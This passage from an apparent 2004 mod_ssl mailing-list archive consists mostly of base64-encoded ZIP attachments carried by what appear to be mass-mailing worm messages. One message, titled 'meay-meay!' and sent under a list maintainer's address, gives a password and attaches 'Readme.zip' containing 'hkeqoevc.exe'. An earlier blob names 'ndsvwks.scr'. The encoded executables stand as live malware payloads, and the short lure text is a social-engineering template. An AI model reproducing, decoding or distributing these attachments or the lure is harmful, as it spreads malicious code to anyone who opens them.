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
AAAAAA==

----------jvhthtyqycwlwwhnwvmx--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 00:41:25 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 81ABAA8982; Thu,  4 Mar 2004 00:41:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from SARAH (dt0c3n68.san.rr.com [24.94.14.104])
	by master.modssl.org (Postfix) with SMTP id 3294EA8944
	for ; Thu,  4 Mar 2004 00:41:22 +0100 (CET)
Date: Wed, 03 Mar 2004 15:41:12 -0800
To: modssl-users@modssl.org
Subject: meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------neeuqybrjbailihuvcki"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------neeuqybrjbailihuvcki
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh, i don't like  the  plaintext  :)

pass: 03506

----------neeuqybrjbailihuvcki
Content-Type: application/octet-stream; name="Readme.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Readme.zip"

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
